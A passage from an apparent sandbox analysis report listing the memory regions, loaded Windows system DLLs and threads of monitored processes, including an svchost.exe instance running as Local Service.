region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2496
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2497
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2498
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2499
start_va = 0x5b0000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2600
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2601
start_va = 0x620000
end_va = 0x762fff
monitored = 0
entry_point = 0x648210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2602
start_va = 0x620000
end_va = 0x6fcfff
monitored = 0
entry_point = 0x67e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2603
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2604
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2605
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2606
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2607
start_va = 0x620000
end_va = 0x7a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 2608
start_va = 0x7b0000
end_va = 0x930fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 2609
start_va = 0x940000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000940000"
filename = ""
Region:
id = 2610
start_va = 0x1d0000
end_va = 0x1d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2611
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2612
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskhostw.exe.mui"
filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui")
Region:
id = 2613
start_va = 0x400000
end_va = 0x400fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2614
start_va = 0x410000
end_va = 0x410fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2690
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Thread:
id = 176
os_tid = 0x478
Thread:
id = 212
os_tid = 0x5dc
Process:
id = "9"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x744cc000"
os_pid = "0x3b8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "7"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cbbc" [0xc000000f], "LOCAL" [0x7]
Region:
id = 2309
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2310
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2311
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2312
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2313
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2314
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2315
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2316
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2317
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2318
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2319
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2320
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2321
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2322
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2323
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 2324
start_va = 0x540000
end_va = 0x540fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 2325
start_va = 0x550000
end_va = 0x550fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 2326
start_va = 0x590000
end_va = 0x596fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2327
start_va = 0x5e0000
end_va = 0x5e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2328
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2329
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 2330
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 2331
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 2332
start_va = 0xb20000
end_va = 0xf1afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 2333
start_va = 0x1110000
end_va = 0x1116fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 2334
start_va = 0x1120000
end_va = 0x1168fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 2335
start_va = 0x1170000
end_va = 0x11effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001170000"
filename = ""
Region:
id = 2336
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2337
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 2338
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2339
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 2340
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 2341
start_va = 0x1700000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 2342
start_va = 0x1800000
end_va = 0x18fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 2343
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 2344
start_va = 0x1a00000
end_va = 0x29fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 2345
start_va = 0x2a00000
end_va = 0x2d36fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2346
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 2347
start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 2348
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 2349
start_va = 0x3200000
end_va = 0x39fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-s-1-5-18.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-18.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-18.dat")
Region:
id = 2350
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 2351
start_va = 0x3c00000
end_va = 0x3cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 2352
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2353
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2354
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2355
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2356
start_va = 0x7ff61f760000
end_va = 0x7ff61f76cfff
monitored = 0
entry_point = 0x7ff61f763980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2357
start_va = 0x7ff856630000
end_va = 0x7ff8566bafff
monitored = 0
entry_point = 0x7ff85664d2a0
region_type = mapped_file
name = "netprofmsvc.dll"
filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll")
Region:
id = 2358
start_va = 0x7ff857040000
end_va = 0x7ff85704cfff
monitored = 0
entry_point = 0x7ff857042650
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 2359
start_va = 0x7ff857840000
end_va = 0x7ff8578b9fff
monitored = 0
entry_point = 0x7ff857867630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2360
start_va = 0x7ff857e20000
end_va = 0x7ff857e2bfff
monitored = 0
entry_point = 0x7ff857e214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 2361
start_va = 0x7ff858270000
end_va = 0x7ff8582b9fff
monitored = 0
entry_point = 0x7ff85827ac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 2362
start_va = 0x7ff8582c0000
end_va = 0x7ff8582e8fff
monitored = 0
entry_point = 0x7ff8582d24d0
region_type = mapped_file
name = "fontprovider.dll"
filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll")
Region:
id = 2363
start_va = 0x7ff8582f0000
end_va = 0x7ff858491fff
monitored = 0
entry_point = 0x7ff85833c2d0
region_type = mapped_file
name = "fntcache.dll"
filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")
Region:
id = 2364
start_va = 0x7ff858b50000
end_va = 0x7ff858b82fff
monitored = 0
entry_point = 0x7ff858b5d5a0
region_type = mapped_file
name = "biwinrt.dll"
filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll")
Region:
id = 2365
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2366
start_va = 0x7ff858c30000
end_va = 0x7ff858ca8fff
monitored = 0
entry_point = 0x7ff858c47800
region_type = mapped_file
name = "geolocation.dll"
filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll")
Region:
id = 2367
start_va = 0x7ff858d70000
end_va = 0x7ff858da5fff
monitored = 0
entry_point = 0x7ff858d80070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2368
start_va = 0x7ff858db0000
end_va = 0x7ff858dc9fff
monitored = 0
entry_point = 0x7ff858dbb670
region_type = mapped_file
name = "tzautoupdate.dll"
filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll")
Region:
id = 2369
start_va = 0x7ff858e30000
end_va = 0x7ff858e47fff
monitored = 0
entry_point = 0x7ff858e35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2370
start_va = 0x7ff85cc10000
end_va = 0x7ff85cd0ffff
monitored = 0
entry_point = 0x7ff85cc50f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 2371
start_va = 0x7ff85d180000
end_va = 0x7ff85d273fff
monitored = 0
entry_point = 0x7ff85d18a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2372
start_va = 0x7ff85d7a0000
end_va = 0x7ff85d7befff
monitored = 0
entry_point = 0x7ff85d7a5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2373
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2374
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2375
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2376
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2377
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2378
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2379
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2380
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2381
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2382
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2383
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2384
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2385
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2386
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2387
start_va = 0x7ff85f950000
end_va = 0x7ff85f957fff
monitored = 0
entry_point = 0x7ff85f951ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2388
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2389
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2390
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2391
start_va = 0x3d00000
end_va = 0x3dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d00000"
filename = ""
Region:
id = 2395
start_va = 0x560000
end_va = 0x561fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netprofmsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui")
Region:
id = 2398
start_va = 0x3e00000
end_va = 0x3efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e00000"
filename = ""
Region:
id = 2399
start_va = 0x3f00000
end_va = 0x3ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f00000"
filename = ""
Region:
id = 2400
start_va = 0x4000000
end_va = 0x40fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004000000"
filename = ""
Region:
id = 2401
start_va = 0x4100000
end_va = 0x41fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 2402
start_va = 0x7ff856600000
end_va = 0x7ff85660dfff
monitored = 0
entry_point = 0x7ff856601460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2411
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2412
start_va = 0xf20000
end_va = 0xffffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2413
start_va = 0x7ff856530000
end_va = 0x7ff856543fff
monitored = 0
entry_point = 0x7ff856531a50
region_type = mapped_file
name = "wlanradiomanager.dll"
filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll")
Region:
id = 2414
start_va = 0x7ff856ce0000
end_va = 0x7ff856d17fff
monitored = 0
entry_point = 0x7ff856cf8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2415
start_va = 0x7ff857fb0000
end_va = 0x7ff858010fff
monitored = 0
entry_point = 0x7ff857fb4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 2416
start_va = 0x7ff8564b0000
end_va = 0x7ff8564c8fff
monitored = 0
entry_point = 0x7ff8564b2180
region_type = mapped_file
name = "bthradiomedia.dll"
filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll")
Region:
id = 2428
start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2429
start_va = 0x7ff85ca20000
end_va = 0x7ff85ca46fff
monitored = 0
entry_point = 0x7ff85ca27940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2430
start_va = 0x7ff856490000
end_va = 0x7ff8564adfff
monitored = 0
entry_point = 0x7ff856491690
region_type = mapped_file
name = "bluetoothapis.dll"
filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll")
Region:
id = 2431
start_va = 0x5a0000
end_va = 0x5cdfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 2432
start_va = 0x7ff856d20000
end_va = 0x7ff856d2afff
monitored = 0
entry_point = 0x7ff856d21d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2466
start_va = 0x4200000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004200000"
filename = ""
Region:
id = 2467
start_va = 0x4300000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 2468
start_va = 0x4300000
end_va = 0x43fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 2469
start_va = 0x7ff85fae0000
end_va = 0x7ff85fb4afff
monitored = 0
entry_point = 0x7ff85faf90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2470
start_va = 0x7ff857ee0000
end_va = 0x7ff857fa7fff
monitored = 0
entry_point = 0x7ff857f213f0
region_type = mapped_file
name = "winhttp.dll"
